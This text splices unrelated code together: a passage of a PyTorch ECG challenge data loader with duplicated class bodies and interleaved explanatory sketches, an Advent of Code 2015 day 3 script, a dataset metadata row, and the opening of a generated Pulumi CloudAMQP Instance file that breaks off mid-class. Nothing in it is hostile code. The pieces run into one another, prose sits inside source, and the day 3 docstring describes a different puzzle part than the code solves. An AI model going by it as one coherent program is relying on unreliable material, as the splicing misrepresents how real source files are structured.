        train_index = train_index.reshape((train_index.shape[1],))
        if training_size is not None:  # for test
            train_index = train_index[0:training_size]
        val_index = val_index.reshape((val_index.shape[1],))

        num_files = len(label_files)
        label_files_train, label_files_val = [], []
        label_train, label_val = [], []
        for i in train_index:
            label_files_train.append(label_files[i])
            label_train.append(labels_onehot[i])
        for i in val_index:
            label_files_val.append(label_files[i])
            label_val.append(labels_onehot[i])

        ### 12 leads order: I II III aVL aVR aVF V1 V2 V3 V4 V5 V6
        if lead_number == 2:  # two leads: I II
            leads_index = [0, 1]
        elif lead_number == 3:  # three leads: I II V2
            leads_index = [0, 1, 7]
        elif lead_number == 4:  # four leads: I II III V2
            leads_index = [0, 1, 2, 7]
        elif lead_number == 6:  # six leads: I II III aVL aVR aVF
            leads_index = [0, 1, 2, 3, 4, 5]
        elif lead_number == 8:  # eight leads
            leads_index = [0, 1, 6, 7, 8, 9, 10, 11]
        else:  # twelve leads
            leads_index = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]

        train_aug = [
            {
                "type": "SlideAndCut",
                "args": {
                    "window_size": 4992,
                    "sampling_rate": 500
                }
            }
        ]
        val_aug = [
            {
                "type": "SlideAndCut",
                "args": {
                    "window_size": 4992,
                    "sampling_rate": 500
                }
            }
        ]

        train_transforms = None
        if train_aug is not None and len(train_aug) > 0:
            train_transforms = []
            for aug in train_aug:
                key = aug['type']
                module_args = dict(aug['args'])
                current_transform = getattr(module_transformers, key)(**module_args)
                train_transforms.append(current_transform)
            train_transforms = transforms.Compose(train_transforms)
        val_transforms = None
        if val_aug is not None and len(val_aug) > 0:
            val_transforms = []
            for aug in val_aug:
                key = aug['type']
                module_args = dict(aug['args'])
                current_transform = getattr(module_transformers, key)(**module_args)
                val_transforms.append(current_transform)
            val_transforms = transforms.Compose(val_transforms)

        # Dataset = eval(dataset_name)
        # tmp
        # label_files_train = label_files_train[0:300]
        # label_files_val = label_files_val[0:300]
        self.train_dataset = CustomDataset4PeakDetection(label_files_train, label_train, label_dir, leads_index,
                                                         sample_rate=resample_Fs, transform=train_transforms)
        self.val_dataset = CustomDataset4PeakDetection(label_files_val, label_val, label_dir, leads_index,
                                                       sample_rate=resample_Fs, transform=val_transforms)

        end = time.time()
        print('time to get and process data: {}'.format(end - start))
        super().__init__(self.train_dataset, self.val_dataset, None, batch_size, shuffle, num_workers)
class ChallengeDataset_2(BaseDataLoader):
    """
    challenge2020 data loading
    """
    def __init__(self, label_dir, split_index, batch_size=256, shuffle=True, num_workers=2, resample_Fs=500,
                 window_size=3000, n_segment=1, normalization=False, training_size=None, train_aug=None,
                 val_aug=None, p=0.5, lead_number=2, save_data=False, load_saved_data=False,
                 to_extract_peaks=False, to_contrast=False, to_filter_noise=False, network_factor=32,
                 to_include_E=True, dataset_name='CustomDataset'):
        self.label_dir = label_dir
        self.dir2save_data = '/data/ecg/challenge2021/data/'
        dir2save_data = '/data/ecg/challenge2021/data/'
        start = time.time()

        # Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
        weights_file = 'weights.csv'

        # Load the scored classes and the weights for the Challenge metric.
        print('Loading weights...')
        _, weights, indices = load_weights(weights_file)
        classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
        ### equivalent SNOMED CT codes merged, noted as the larger one
        classes = classes.split(',')
        self.weights = weights

        # Load the label and output files.
        print('Loading label and output files...')
        label_files = my_find_challenge_files(label_dir)
        ### load file names
        # idx2del = np.load('process/idx2del.npy')
        label_files_tmp = []
        count = 0
        for f in label_files:
            count += 1
            fname = f.split('/')[-1].split('.')[0]
            # if fname[0] == 'S' or fname[0] == 'I':
            #     continue
            label_files_tmp.append(f)
        label_files = label_files_tmp
        labels_onehot = load_labels(label_files, classes)

        split_idx = loadmat(split_index)
        train_index, val_index = split_idx['train_index'], split_idx['val_index']
        train_index = train_index.reshape((train_index.shape[1],))
        if training_size is not None:  # for test
            train_index = train_index[0:training_size]
        val_index = val_index.reshape((val_index.shape[1],))

        num_files = len(label_files)
        label_files_train, label_files_val = [], []
        label_train, label_val = [], []
        for i in train_index:
            if i >= len(label_files):
                print(i)
            label_files_train.append(label_files[i])
            label_train.append(labels_onehot[i])
        for i in val_index:
            label_files_val.append(label_files[i])
            label_val.append(labels_onehot[i])

        ### 12 leads order: I II III aVL aVR aVF V1 V2 V3 V4 V5 V6
        if lead_number == 2:  # two leads: I II
            leads_index = [0, 1]
        elif lead_number == 3:  # three leads: I II V2
            leads_index = [0, 1, 7]
        elif lead_number == 4:  # four leads: I II III V2
            leads_index = [0, 1, 2, 7]
        elif lead_number == 6:  # six leads: I II III aVL aVR aVF
            leads_index = [0, 1, 2, 3, 4, 5]
        elif lead_number == 8:  # eight leads
            leads_index = [0, 1, 6, 7, 8, 9, 10, 11]
        else:  # twelve leads
            leads_index = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]

        train_aug = [
            {
                "type": "SlideAndCut",
                "args": {
                    "window_size": 4992,
                    "sampling_rate": 500
                }
            }
        ]
        val_aug = [
            {
                "type": "SlideAndCut",
                "args": {
                    "window_size": 4992,
                    "sampling_rate": 500
                }
            }
        ]

        train_transforms = None
        if train_aug is not None and len(train_aug) > 0:
            train_transforms = []
            for aug in train_aug:
                key = aug['type']
                module_args = dict(aug['args'])
                current_transform = getattr(module_transformers, key)(**module_args)
                train_transforms.append(current_transform)
            train_transforms = transforms.Compose(train_transforms)
        val_transforms = None
        if val_aug is not None and len(val_aug) > 0:
            val_transforms = []
            for aug in val_aug:
                key = aug['type']
                module_args = dict(aug['args'])
                current_transform = getattr(module_transformers, key)(**module_args)
                val_transforms.append(current_transform)
            val_transforms = transforms.Compose(val_transforms)

        # Dataset = eval(dataset_name)
        # tmp
        # label_files_train = label_files_train[0:300]
        # label_files_val = label_files_val[0:300]
        self.train_dataset = CustomDataset4PeakDetection(label_files_train, label_train, label_dir, leads_index,
                                                         sample_rate=resample_Fs, transform=train_transforms)
        self.val_dataset = CustomDataset4PeakDetection(label_files_val, label_val, label_dir, leads_index,
                                                       sample_rate=resample_Fs, transform=val_transforms)

        end = time.time()
        print('time to get and process data: {}'.format(end - start))
        super().__init__(self.train_dataset, self.val_dataset, None, batch_size, shuffle, num_workers)
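# The `lead_number` branch in the loaders above maps a lead count to index
# positions in the fixed 12-lead order. A standalone sketch of the same
# mapping; the names `LEAD_ORDER` and `leads_index_for` are illustrative and
# not defined in this module.

```python
# 12-lead order used by the loaders: I II III aVL aVR aVF V1 V2 V3 V4 V5 V6
LEAD_ORDER = ['I', 'II', 'III', 'aVL', 'aVR', 'aVF',
              'V1', 'V2', 'V3', 'V4', 'V5', 'V6']

def leads_index_for(lead_number: int) -> list:
    """Mirror the if/elif chain: named subsets of the 12-lead order."""
    subsets = {
        2: [0, 1],                       # I II
        3: [0, 1, 7],                    # I II V2
        4: [0, 1, 2, 7],                 # I II III V2
        6: [0, 1, 2, 3, 4, 5],           # limb leads
        8: [0, 1, 6, 7, 8, 9, 10, 11],   # I II plus the six chest leads
    }
    # Any other value falls back to all twelve leads, as in the else branch.
    return subsets.get(lead_number, list(range(12)))
```

For example, `[LEAD_ORDER[i] for i in leads_index_for(3)]` yields `['I', 'II', 'V2']`, matching the "three leads" comment in the loaders.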
# 15/3_vacuum.py
# -*- coding: utf-8 -*-
"""
^ > v < step one house north, east, south, west (Advent of Code 2015, day 3).
'^>v<' visits four houses in a square, delivering twice to the starting house.
"""
dirs = '^><^>>>^<^v<v^^vv^><<^<><<vv^<>^<^v>^vv<>v><vv^^<>>^^^v<<vv><<^>^<^v<^>^v><<<v^<v<<<v<<vv<v<^><^>><>v>v^<<v^^<^v<><^>^<<^^^>v>>v^^<v>>^>vv><v>>^>>v^>^v>^<^^v>^>^^v<v>^^<v<>>v^^v><^><^<<>v^<^<^v<v>v^>>>v^v^>^<>^v<^^vv<v>^>^<>^^<vv^<><<v<^<^^>vv<>^>v<^>^v>v^>^v<>^><>><vv<>v^v<><>v^v>>>>v^^>^><^^<v<^><^<v>>^v^v<>v<<<^<<vvvv<<v^vv^>v^^^<^^^<v>>v<^v>>>>>v<^^^^>v<^<><v>>>>><v>>v^vvvv^^<v^<>^v<^v^>v><^>^v<<>>vv^>v>v^^>vv^<^vvv<>><>><><^^^<v<>^<^^^<v><^v>>v>^v<v^vv^<>^^^>v^^^v>>^v^^<^>>^>^<<v>>>^^<>>^vv>v^<^>>>><v<><><^^v<><<<<^^<>>^<vvv^><>v<v<<<<><v<<v>v<v^><vv<v^>^<^>v^^><^v>^^>v<>^v^<>^vv^><v^^vv>vvv>v>^<vv^>>^>>^>><>>>^^^^v<vv>^<>v^^><v^>^<>v<^^v><v<<><^v><>^^^^^v^v>>^^v><<><<vv>^^^^><^>v>><<<^v>v^^>^v^<^^v>v<^<<>>^v<<<v<<>>v<^v^><vv<v^v>v^<v>><v>^v<<<vv^>v<v>>v>>v><v><v^>v^^v>^v^>>>><>^>v>^v^>>>>v^<<vv<^v><<>v<v^<^^<<v<^v^^v^>vv><vv<v^<^>><^^>^<><^^<v<><^v^v^<^^>^<v><^<v>v^<<<^^v<v>^v>>><>^^>vv<<^v^<<<<^^>>>v>v<<<>^^>>>v>^>v>vv<<>^<^><v^>^^<^<v<<v<^>>^v^<vvv><>v^><<v>^^<v^vv^^^<vvv^<^>^>vv>><^v<^<<v<><<><<^^<><><vv>v>^<v>>^<>>^^v>vv^<^^v>><^vv^<<v^^><<>vv<v<><v<><v^^^v^v>^v<^<>v^^>><>^<^<v^<v^v^>v<<<^<<^>>>^^<^^v>v^<v>vvvv>v<>><^>^<<<<v^<v<>v^^^v<>v>^<v<<^^v^^<>^<<v^^<^<v>v>>v>>v^>^<vv<<<<<^<><>v><>>>v^>^v<^<><<v<^v^^<^<><^>^^^>^><>^><<vv>^<>vv<<v^v<<<<<>>>v<vv>^v>^>^>^<^><>v<><>>>^^<v>^<^v>>^<><v^><v^>>>v<v^^vvv^><v<v>v^>vvvv>>><^>v<>^^^>v>>v^<v<>v^>^<v^>^<<^>^>>v<<><<v^^>>v^<v^<^v^>^>v^><<^<v>v^<v>>^^<<v>v><<<^v^<>^<>^>>^<<v>^^<>^v<>v^>>><<v>><v^>^><v^<><v><>><v^<>vv>v^<^^^>v>^^<vv>>^v<><>>><>><^<>>v>v^^>^^<^^>^>>v>vv^^v<^<^v><vv<v<^>><<vvv<<><^>^v>^^^<<>v^<v<v><<v>^^v<<<>^^vv<^>vv>^>^<><<>vv<^>v^vv>^^^v><<^vv>^v<><v^^^^v^>vv^^<^<>^^v^<^vv<v<vv<>v>v^^<>^^>^^>^<><<^v>^><^^vvvv<><>^<v^^>v<>^><>v>><>vv^<<><<>><>v<^>^v>>^^v><<<>>^<^v^<v<<<v^>^^<^<><><^><<<<^<vv><v<<><vvv^^><vv>^<<vv<<<^v<>>><><>>v><<<v>vvvv^^vv<v>><<^v^vvv><><vv>v><>v<<<^<v^>><^^>v^<v>><v>^^^v^v>><<<v<^^>>^v<>v^<vv^^<<v<v>v<<<<^^^v^v<<>>>v>>vv>^^<><^v<v><>>v^>>>>>^>v^v^<^v^v^vvv>v<v<^>vv^<<v>vv>
>v^^vv<^v>>>>vv<>v<>^^vv^<v>v^>>vvv<<<v<<^vv^^^^>v>v>^><<<^>v^><v<^<<<v>^v^^^><<><<<^^<^^<>^<v>^<v<<v<^^vv>v<^v><v><v<>^v<^<v<^<v^v><v>><v<v<<>^<v<>>><>^v^v<<^><v^<<v<v^>^>v><^>^vv^^<v<v<vv<v>^v^v^>^<<>>>>>v^<>^>v^vv^><<>>^^<>v^><v>^vvv^>v^v><>^><<>v>v<^<^><^^vv<<><>>v>>v><vv>>^v<<>^vv<>^vv>v>v>^>^>>><><<>v<v>^<<^v^^<<<><v>>vv<^<vv<vv^<<v<<^v><<>v<^^^<<^v^>^v>^^^v^v>>>v>v^v>^>^vv<^^<<vv^>^<<<vv>v^<><<^vvv^^><>vv^v>v>^><<^^^^vvv^<vvv>><^v<^>^<>>^<v<<vv>>><v>vv^<>><v^<v>^v>^>v>^<^<^^^<<vvvv^>>>>>>>v><vv>^<>^^v^><>><^v^^<v^v<<<<v^>><>v^v<vv<><^<<<<^>^^>vv>><^v<v^v<<>^vvv>v^^><^^<^<>>^^v^vv<>v<^<<<v^^^><v<vv<<>v>v<>^v^><v^vv^v^^v<^^v^^v><>v<^v>><<^<^v^>><<vv<<^>^<<v^<>^><>v><vv^v>>^<v<<<^>vv<^v>^>v<<v>^>>^>>v^<v<v>>^v<^v^v><<><>^><<<><v<vvvv<v^<v^v><>^<>^^^^v>^>^vvvvv>v>>v><<vv<<v<><<^><<^v><<v<<<v><vv<^>^v>>>>^v<^v<<>>^>^<<vv^<^>v>><<^>^>^v><><>^><<v<>v^><<^v^<^^><^^v^<<^v^^>>^v^<^><vv>v^^<<^^^<><>^>v^v>v^>^v^vv>^^>>>>^^<^>>>^^v<vv<><^^<vvv<^^^vv>v<v<v>><<<>^>^^>^>^v<<<<>>^<<>><v>>v>^^<^v<>v<>v^>v^><^<^^><v^^v>^^vv<v<<>><<vv<>>v>^<<<<v<<v>^><^^<^<^<v^<<^^v>^v<^>v^v^<v^vv^>^^><^>v^v>>^^v^><vv<v<v<v>>>>><<><v><v^v^<v^<^^<v<>^>v>v<>>>v>^^^^>><v^v^^v<<<>v^<<^<v>>>><^v^<<><v<>>v><><v<v^v>^v^^<v<^<^^v>><<vv<<vv><>>^>^>vv<^<>^vvv^v<v^^<>v^v>^^<<<<<>^v^>^<>v^^<>v^v<vv>^<>vv^<^vv>><v^^vvvvv>><<>v<vv^<^<vv^v^<>^^<v^<vv^<v^v^v<<^>^>^>^^>>>vvv>^>v>v>>>^>vv^><>^><>v>^^<v^>^><<v>><<<>>v<vvvv^>^v<^<>^<v>^<>^^<<><>^v<><>>>^vv<^<<^<^v>v<<<<<^^v<^v<><v<<><^>v>^v>>^v^><^^^^v<><><>vv^<>vv<^v<^^><v^<^><^^v^v^<^^<<><v>v<v<v^<<^v><>v^v<^>vvv><<^v>>v><><v<<^>>>v<^>>v>^<>><>^<v^v^<vv<<^>v<^^>^<^v<^<<^^v<>>^>^>^v^^v^v<v^^vv^<v>>v><vv^vv>v<>v^>v^^>^^>><v><v^<<><<>><<^^>><^v<v<><<><<><v<v^<^<v>>>><v^^v^^>>>^^^^^<<vv<^><>^<<<vv^^^>^><<<v<^v>^<v<^>^vvv<<>vv><<>v>v^v>>>>>^<>><^^^><<<<v><<vv>>>v<^<vv^v^<<v>>>>^^vvv>v<>><v>>>v>>^v^vvv<<>vvv<<^^^<>vv^^v<<>^^^>>^<^v^<^^>v^><v>>^<<^v<<vv<vv>v^>>^>v^><^><>^>>>vv>><^^^>vv<<^^vv><^<>^>^^<^<>>^vv^>>^v><>v^>>><<<^^<^>^>v<^>^<^^<>>><^^<>^v^<<vvv<v><>vvv><v>v^v
<<^<v>^^><<^vv^v>v>v<<^v^<<<>^><><vvv>v>^vv^v<>vv^>^^<^>^>v^^<vv^>v><v<<<><>>^v<^<><><^<v^^<<^<v>vv<><<>v^<v^>^>^^<><<>^<^<<v^^v<v^<><<>v>><^<<>^>^v^v<v^v><^>>^v<^>v<<>^^^<^v>>>^<v>vvvv<<v^<^^>vvvv>v<>v<v><vvvvv>^<><>vvv<>^<<>^>>>>v^<^<><^v>v^>>v><>^><<v^>^<<>^>^v^<v^^>>^v><v>^<v><>v^<^^>v>^>>>v^v>>>^<>^<>>>>>v>>vv^v<><<<><><v><<vv<<v<><>>vv<^<vv>^v<<>v^v<^v<><v>>^v>>vvv^^v>>v>^>^>v><v><^>^^<<>^v<^<<<<^>v<^>>v^<^v>^v<<>^>^vvv<^^vv>^vv>vv<>>v>v<v>>v^<<<<<^^v^>v>^<<<v^v>>v<v><vvv><v>^<vv><<>>^<^>^^<>>>>^<^v<>v^^>^<^^v<^><>><v>>^v^vv<^v<^><<vvv<>><>><^^>^<^v^<^<>v<<<^v>v^^^<>v^<v^>^v^>><>^^<v<^><<^^v^<>^<^vv>>><^v><v^>vv<^v<<<v^>>v>v^v>^<v>v<^<>v^vvv>^vv<<<<v><^><v>>^^>><^v><<^>v^^<<v^^<^<><<<<>^<v<^v^>v<<^^>v<<<<<vvv<v<^>^>^>^>>^>>>v^<<v>>^^v><vv<^v<v<^^^>>>^vvv<^v<>>>vv>^^><^v>vv^>>v>v^<>^<vv>^>^<<^>^^^>>^vv>^^>vvvv<>>^^^^>>>v>v^^>vv>vv^<<>^><^<v^vvvv><v<><v>><<<v<v<<^v><vv^vv^<>>>^>^<v<^v<>><^<vv^^><v>v^>v^<><v^vvv>^>v^^v^>^^>v<<<<^<<^>>v>v^^^<<<v>>>^^v>v<v><<<<^^^v>^vv^>><>^v<v<<^^<<<<><>>>v>vvv^v^^v^>>vv>^>><>^v><^v^><^^>vv>^<^<^>><v>v>><><><v>^>^>v>vv>vv>^^>v>v^><v<<v^<>^>^v>^^v>^<^v<>>vvv^^>^>vv<v<v<<^<^<v^<>v^^v<^<^>vv^^<v><^^^>v>vv<<v>v<<v^<v^^><vv>^>^v^<^>v<^>^<>vv^><v<^><>>^>>^<^><<>^<^>v>v><>>>^<<^><<v><^v<v><>>vv<^><v^>>v>v>>>>^^>v<^v^>><<^<>>v><^><<^>^<vv^^<><<>><vvvv^>^^<><^^v>^^>vv>^v<v>>^^v^<v<^><^<<>>v^^^<^><^<<><<v<>><<>^v>vvv^vvv^^>>^<^<v>><>^<<<<^^<>>>v^<<^^v>><><<v<^>v>^v<v^>v>vv^><>^><<><^^>^>^<><>><^^<v^v<^><><><v>^<v<<v^<<^^^v<v<^v<>>><^v<<<<>>^v>^^vv^v^<<v>><<<v>vv>>v>>^v^<>>vv^<^>^<<>v<<<^vv<^vv^vv<^v^^^<vv^>v>>v<^^<^^vvv<^^v<>>>^>v^><v>^^><>vv>v>v<<<^^v<^vv^v>^^^>>>^^<>^^<^vvv>><><<><^<v>><<>^>^^<v^v^>vv>vv<v>^^<^^<<><><<v><v^^>v><v><<>v>vvv<^^^^<^>>><<<^^^<^>vv^^v>>v<<v^^<vv^<^>vvv^^v^^<^<vv>v<^<>^<<vv^^>^v>>^><><>v<v<v<>><v>>>^^>>v^><v^^<^>><>v<><<v^v<v<<>>>><>>>>><<^vvv<<><><<>^><><<^^v><<^>v>^>^v>v>>^^<><^>vv<^<^v>v<><^<<v<><^><>^^^<v^<><vvv^^^<>^^v><v<<<v>><>^>^vv<v^<vv>v>v^vv<v^v<v>^v^>v><>v^><>v>^^^^><<vv^><v<<v<^<>^v^^^>^^><<<v<^<v^>
^^>v><vvvvv^<^<v^^>v<^v^^vv^<<<<v><^>v>v^v><><v^<<^<<v<^^^>^><v^v^<><><>^v<v>^<>^v>^v>v^<><^><v>>v<<^><^vv^<><^<>><>><v<v><<^^^^>v<^<^vv<><^vv><<^<<v>v^>>^v>^>v^^v>vv<v>v<<v>v<>^>>vv^>>><>^v^^<^>v<<^<^^v^^v^<<v<<v<^v<>vv^<v>><^v<^>>>vv^^<v^<>^^v<v<v>>^><^^^<><<^^>v<<vv>><<vvv>><<v^v^>><>vv^><<^>^><^v<^<^<vv<^^vv>v^v<<<<<<><<vv^vv>vv>v<^><<><><<>>v>><v><^>^v>^v^<>v^^^><^^<<<^vv^vv>^v^vvv^^>v^<v>><^<^<^<>^vv<vv^v^^>^^^>vv^v>>><<<^<>>v>v<^^<><v>>><><^v^^<<><<<>^<^^v^>v<vv^^^^>><v><^<<v<<v<>^>^>>^<>^v><>>^<v<vv^<<^<<>vv^>^^<<<^v<>>^v<>vvv<<^^<<><vvvvv<<^<^^<>>>>^^<><>^><>^v<v^^v<<v^^<^<^>v<v>^v<^>^v<>v^vv<><<v>^vvv<><<^>>^^><><>^<>^>v^^v^><v<><>>v><v^<v<<v>><^v>^<v<^>v<<<>vvv^<^^v<vvv^vv<>^<>^>>v<>^^><><v>>^><^^vv>><<>><v><^><>>^vv>v<vv<>v^v^^v<<^^<vv>v^^vv<<^<<><>^<><v^><^<^<>>^vv<v>v>>^<^vv>^vv^>v>^<><^><^<>v^v^^<^<>^^v>>><^v<>v^v<<^>v><>^^<<v^v<>v^>>v>^<><vv^v<v^<vv<>^>^>^<^>v><<><><><<<>^>><v^^><^>><v>>^v<<<^<<>^><<^>>>>>v<^>v>>v^<v^>^>v^^><>v^v^vvvv<v<v<>v>>><<>^<<vvv><v^v^>v<v^^^>>^<v>>^vv^^<vv><^>>v<v^><vvv<^^>>vv^v<^<>^v^<<v>^<<><<<^vvv^>^^<<>>><v<^>vv<<^<><^v<^<><<^^>vv^v>v^^^>>>>^>vv<<v>v>>^^v^^><>v<<^><^<v^>>^>v^v>><^v^>v<<^<v><^<^<^<>>v^^>><<<>v<v>v<^^>^vv<<<^^<v<>v^^>v<<><^<>^^>^v<>v>><^^^vv^>^><>v^^<v^<>>^<v^^^><v<><vvv>v>^<<^v>^>>>>><^^^<>v<v>>v^^<^v^>>v^<<v^>^>v^v>>>>^>>vv<>^<^v><v^^<>v>v^v>^<>^>v<vv><<v<^v<<^v<<^v^vv<><>^<>>^<>>^<>v^><<>^v>>^^^^<<^v><>^<^>^^v><^^<^<v^<^^v>^v><vv>v<<^>^>><<^^^vvv<<^vv<^^>v^^vv^<^^<<^^>>^^<vv<v<<v^^<<v<^vvv<<><<v>v^>>v^^>v<^>^><v<^>v<v^v<v^^<>v>><<v^v^v<^^^><v>v><^<^vv>^^v>^>v<<^vv><^^^^^^><<^>>>^v<>^^v<<<>><<<v^><>^<<<v>v^>^^^<^><v>^^^v<<>v<v>^<v^>><<^^<<^v<<>^v>>vv>><v<^><v<<<vvv><vv><<^v^^<v^vvv<^v>>v^v<v^v^>>^^v<><^^^<^^>v>^<><v<<v^^>vvv^v^^<v<v^v>^>v^^v<^><v^^<<<<>^^>>^v<><^><^<<^vv^<><<>v^vv^<v^<><<<^^>v<<>>>v<>v<><<<v>^v>^^v>^^>v>^>^>v<>><>^>^>^vvvv<^<v^<>^^^^v>v>><<v>>^<vv>>^<v<^v^vv>><>^^>v^^<<><^<v>><<<<>v>^^><v^^v<<v<><vv^v>^<v^^>v<<<<v^v<<>>vv<v<<<v>v>>v<^v>>v>v^<<<>^>^>^<>v<^^vv><^v<<^v<vvv^vv>v<^<<^^vv^^>vv<
^>v>^^<<v^<<^^v<>^>v<<^^<^>^^^v^^<v<^<^>>>v^vv^<^v>^<>^<^<v<^v>>>^<^v<><v<^vv<v>v><v^v^^v<vv><^^<><>^>v<^<^vv>><^v><v<>^<>^^>^<><<<v^>>^<>><<><v>vvv^<<^<vv<v><v<^<<<^>^>>v<^>>vv>^v^^^v<>v<>><>^vv^>vv^' # noqa
dirs_1 = '>>v<^>'
dirs_2 = '^v'
dirs_3 = '^>v<'
dirs_4 = '^v^v^v^v^v'
x_dict = {'<': -1, '>': 1}
y_dict = {'^': 1, 'v': -1}
def get_coord(string, x, y):
    if string in x_dict:
        x = x + x_dict[string]
    else:
        y = y + y_dict[string]
    return x, y


def travel(dirs):
    santa = []
    robo = []
    x = y = a = b = 0
    santa.append((x, y))
    robo.append((a, b))
    i = 3
    for string in dirs:
        if i % 2 == 1:
            # odd step: Santa moves
            x, y = get_coord(string, x, y)
            santa.append((x, y))
            i += 1
        else:
            # even step: Robo-Santa moves
            a, b = get_coord(string, a, b)
            robo.append((a, b))
            i += 1
    min_houses = len(set(santa + robo))
    print(min_houses)


if __name__ == '__main__':
    for drs in [dirs_2, dirs_3, dirs_4]:
        travel(drs)
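The alternating walk in `travel()` can also be written as a pure function that returns the house count instead of printing it; `visited_houses` below is an illustrative rewrite, not part of the original file. The expected values are the published Advent of Code day 3, part 2 examples:

```python
def visited_houses(dirs: str) -> int:
    """Count distinct houses visited when Santa and Robo-Santa alternate moves."""
    moves = {'^': (0, 1), 'v': (0, -1), '>': (1, 0), '<': (-1, 0)}
    positions = [(0, 0), (0, 0)]  # Santa at index 0, Robo-Santa at index 1
    visited = {(0, 0)}            # both start at the origin
    for i, ch in enumerate(dirs):
        x, y = positions[i % 2]
        dx, dy = moves[ch]
        positions[i % 2] = (x + dx, y + dy)
        visited.add(positions[i % 2])
    return len(visited)


print(visited_houses('^v'))          # 3
print(visited_houses('^>v<'))        # 3
print(visited_houses('^v^v^v^v^v'))  # 11
```

Tracking both walkers in a single `positions` list indexed by `i % 2` avoids the manual step counter in the original.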
34fa08174c26bb526414826e2ac343ef1626b1af | 32,240 | py | Python | sdk/python/pulumi_cloudamqp/instance.py | pulumi/pulumi-cloudamqp | 1d411fb0076c257b51a6b133aaedb9292efa2373 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-09-23T11:53:33.000Z | 2021-12-01T20:56:35.000Z | sdk/python/pulumi_cloudamqp/instance.py | pulumi/pulumi-cloudamqp | 1d411fb0076c257b51a6b133aaedb9292efa2373 | [
"ECL-2.0",
"Apache-2.0"
] | 53 | 2019-12-09T20:12:27.000Z | 2022-03-31T15:21:00.000Z | sdk/python/pulumi_cloudamqp/instance.py | pulumi/pulumi-cloudamqp | 1d411fb0076c257b51a6b133aaedb9292efa2373 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2019-12-11T09:29:16.000Z | 2019-12-11T09:29:16.000Z |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['InstanceArgs', 'Instance']
@pulumi.input_type
class InstanceArgs:
    def __init__(__self__, *,
                 plan: pulumi.Input[str],
                 region: pulumi.Input[str],
                 name: Optional[pulumi.Input[str]] = None,
                 no_default_alarms: Optional[pulumi.Input[bool]] = None,
                 nodes: Optional[pulumi.Input[int]] = None,
                 rmq_version: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 vpc_subnet: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing an Instance resource.
        :param pulumi.Input[str] plan: The subscription plan. See available plans.
        :param pulumi.Input[str] region: The region to host the instance in. See Instance regions.
        :param pulumi.Input[str] name: Name of the CloudAMQP instance.
        :param pulumi.Input[bool] no_default_alarms: Set to true to skip creating default alarms when the instance is created. Can be left out; defaults to false.
        :param pulumi.Input[int] nodes: Number of nodes: 1, 3 or 5. **DEPRECATED. To change the number of nodes, update the subscription `plan` instead.**
        :param pulumi.Input[str] rmq_version: The RabbitMQ version. Can be left out; the CloudAMQP API default is then used. **Note: the provider cannot yet change the RMQ version. Once set at creation, it will remain.**
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: One or more tags for the CloudAMQP instance, making it possible to categorize multiple instances in the console view. By default no tags are assigned.
        :param pulumi.Input[str] vpc_subnet: Creates a dedicated VPC subnet; shouldn't overlap with other VPC subnets. Default subnet is 10.56.72.0/24. **NOTE: an extra fee is charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
        """
        pulumi.set(__self__, "plan", plan)
        pulumi.set(__self__, "region", region)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if no_default_alarms is not None:
            pulumi.set(__self__, "no_default_alarms", no_default_alarms)
        if nodes is not None:
            pulumi.set(__self__, "nodes", nodes)
        if rmq_version is not None:
            pulumi.set(__self__, "rmq_version", rmq_version)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if vpc_subnet is not None:
            pulumi.set(__self__, "vpc_subnet", vpc_subnet)
    @property
    @pulumi.getter
    def plan(self) -> pulumi.Input[str]:
        """
        The subscription plan. See available plans.
        """
        return pulumi.get(self, "plan")

    @plan.setter
    def plan(self, value: pulumi.Input[str]):
        pulumi.set(self, "plan", value)

    @property
    @pulumi.getter
    def region(self) -> pulumi.Input[str]:
        """
        The region to host the instance in. See Instance regions.
        """
        return pulumi.get(self, "region")

    @region.setter
    def region(self, value: pulumi.Input[str]):
        pulumi.set(self, "region", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the CloudAMQP instance.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="noDefaultAlarms")
    def no_default_alarms(self) -> Optional[pulumi.Input[bool]]:
        """
        Set to true to skip creating default alarms when the instance is created. Can be left out; defaults to false.
        """
        return pulumi.get(self, "no_default_alarms")

    @no_default_alarms.setter
    def no_default_alarms(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "no_default_alarms", value)

    @property
    @pulumi.getter
    def nodes(self) -> Optional[pulumi.Input[int]]:
        """
        Number of nodes: 1, 3 or 5. **DEPRECATED. To change the number of nodes, update the subscription `plan` instead.**
        """
        return pulumi.get(self, "nodes")

    @nodes.setter
    def nodes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "nodes", value)

    @property
    @pulumi.getter(name="rmqVersion")
    def rmq_version(self) -> Optional[pulumi.Input[str]]:
        """
        The RabbitMQ version. Can be left out; the CloudAMQP API default is then used. **Note: the provider cannot yet change the RMQ version. Once set at creation, it will remain.**
        """
        return pulumi.get(self, "rmq_version")

    @rmq_version.setter
    def rmq_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rmq_version", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        One or more tags for the CloudAMQP instance, making it possible to categorize multiple instances in the console view. By default no tags are assigned.
        """
        return pulumi.get(self, "tags")

    @tags.setter
